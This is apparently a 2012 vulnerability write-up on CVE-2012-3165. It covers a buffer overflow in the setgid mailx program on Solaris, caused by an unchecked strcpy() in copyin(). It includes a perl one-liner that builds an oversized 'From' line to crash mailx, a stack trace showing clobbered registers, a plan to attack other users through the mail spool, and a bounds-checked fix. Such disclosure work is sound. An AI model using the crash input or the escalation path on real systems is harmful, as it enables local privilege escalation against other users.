2012/10/18
tags: solaris mailx vulnerability CVE-2012-3165
mailx(1) on Solaris 10 and 11 is world-executable, setgid and vulnerable to a buffer overflow bug. Via the mail group a local attacker potentially wins access to the local mail spool (/var/mail) and sendmail(8) configuration. They may then repeat the attack on any user susceptible to using mailx to read from the spool.
The problem occurs in the copyin() function of head.c (cribbed from an old copy of OpenSolaris source):

```c
/*
 * Copy the string on the left into the string on the right
 * and bump the right (reference) string pointer by the length.
 * Thus, dynamically allocate space in the right string, copying
 * the left string into it.
 */
static char *
copyin(char src[], char **space)
{
	register char *cp, *top;
	register int s;

	s = strlen(src);
	cp = *space;
	top = cp;
	strcpy(cp, src);	/* no bounds check against the end of *space */
	cp += s + 1;
	*space = cp;
	return(top);
}
```
The phrase "dynamically allocate" in the comment is incorrect. No new memory is allocated and therefore the target can be overrun. We can hit this by providing a very long "From" line in a message:

```
From AAAAAAAAAAAAA...
```

like this:

```
mallory@sunos:~$ perl -e 'print "From ".("a"x2048)."\n";' > /tmp/mbox
mallory@sunos:~$ mailx -f /tmp/mbox
Bus Error (core dumped)
mallory@sunos:~$
```
On SPARC this generates SIGBUS with this stack:

```
ffbfcee8 setptr+0x49c(41414141, 43530, 0, 1, 0, 1)
ffbff778 setfile+0x510(40c00, 1, 1, 436e8, 44f8c, 43400)
ffbff8e0 main+0xa04(44800, 6d, 46910, 46910, 3f400, 1)
ffbff9c0 _start+0x108(0, 0, 0, 0, 0, 0)
```

faulting here:

```
setptr+0x498: f0 03 a0 64 ld [%sp + 0x64], %i0
setptr+0x49c: ec 06 20 00 ld [%i0], %l6
```
At this point (setptr+0x49c), register %i0 contains:

```
%i0 = 0x41414141
```

whereas it should contain the address of the progname string variable ("mailx"). That is, the stack has been clobbered by "AAA...".
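As an added example (not the Solaris or OpenSolaris code), here is a bounds-checked form of copyin() that refuses a sender string that would not fit in the caller's buffer, with a small harness that feeds it a normal separator line and a 2048-byte one like the perl test above. The arena size, the function names and the "From " parsing are assumptions made for the demonstration.

```c
#include <stddef.h>
#include <string.h>
/*
 * Bounds-checked replacement for copyin() (added example, not OpenSolaris
 * code). The caller passes the end of the arena *space points into; the
 * copy is refused when src plus its NUL would not fit, instead of running
 * past the arena as the original strcpy() does.
 */
static char *
copyin_bounded(const char *src, char **space, const char *end)
{
	size_t s = strlen(src);
	char *cp = *space;
	if (cp == NULL || end < cp || (size_t)(end - cp) < s + 1)
		return NULL;		/* would overrun: refuse the copy */
	memcpy(cp, src, s + 1);		/* s + 1 bytes are known to fit */
	*space = cp + s + 1;
	return cp;
}

#define ARENA_SIZE 256	/* assumed header arena size for the demonstration */
/*
 * Stores the sender from an mbox "From " separator line into a fixed arena,
 * bumping the write pointer as the original does. Returns 1 if stored, 0 if
 * the line is not a separator or the sender is rejected as too long.
 */
int
store_from_line(const char *line)
{
	char arena[ARENA_SIZE], *space = arena;
	if (strncmp(line, "From ", 5) != 0)
		return 0;
	return copyin_bounded(line + 5, &space, arena + ARENA_SIZE) != NULL;
}

/* Builds "From " plus n repeated 'a's, like the perl one-liner above
 * (constructed input), and tries to store it. */
int
store_long_from_line(size_t n)
{
	char line[4096];
	if (n > sizeof(line) - 6)
		return 0;
	memcpy(line, "From ", 5);
	memset(line + 5, 'a', n);
	line[5 + n] = '\0';
	return store_from_line(line);
}
```

With the original strcpy() the 2048-byte line overruns the arena; here it is simply rejected and the write pointer is left untouched.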
The local mail spool typically looks like this:

```
drwxrwxrwt 3 root mail 512 Oct 17 02:03 /var/mail
-rw-rw---- 1 root mail 709 Sep 26 05:54 /var/mail/root
```
If the mail file does not already exist then the attacker can immediately create a malicious file (since the spool is world-writable). Otherwise they can first attack the mail group and then use those privileges to obliterate and replace any existing mail file in order to target individual users or roles, including root.
I checked back through the UNIX archives via Unix Tree to see just how old this bug was. I can trace it right back to BSD 2.79 (and it may be even older). 2.79 was released for the PDP-11 in 1979 making this the oldest bug I've ever found by quite a way.